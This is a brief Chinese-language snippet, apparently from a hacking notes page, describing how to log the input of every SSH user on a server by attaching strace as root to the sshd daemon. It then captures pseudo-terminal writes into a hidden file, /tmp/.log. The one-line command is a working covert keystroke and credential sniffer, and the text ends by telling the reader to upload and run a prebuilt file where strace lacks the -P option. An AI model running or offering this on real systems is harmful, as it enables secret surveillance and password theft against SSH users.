记录所有ssh登陆用户的输入记录
strace
利用strace记录进程的syscall,需要root权限
-e trace=write仅记录write的syscallsignal=none不记录信号相关-f追踪子进程-P /dev/ptmx记录虚拟终端的write操作-p 99999999为sshd守护进程的PID-o /tmp/.log记录到文件/tmp/.log
1 | strace -e trace=write -e signal=none -f -P /dev/ptmx -p 9999 -o /tmp/.log |
执行效果
不支持-P的情况
下载此文件,上传执行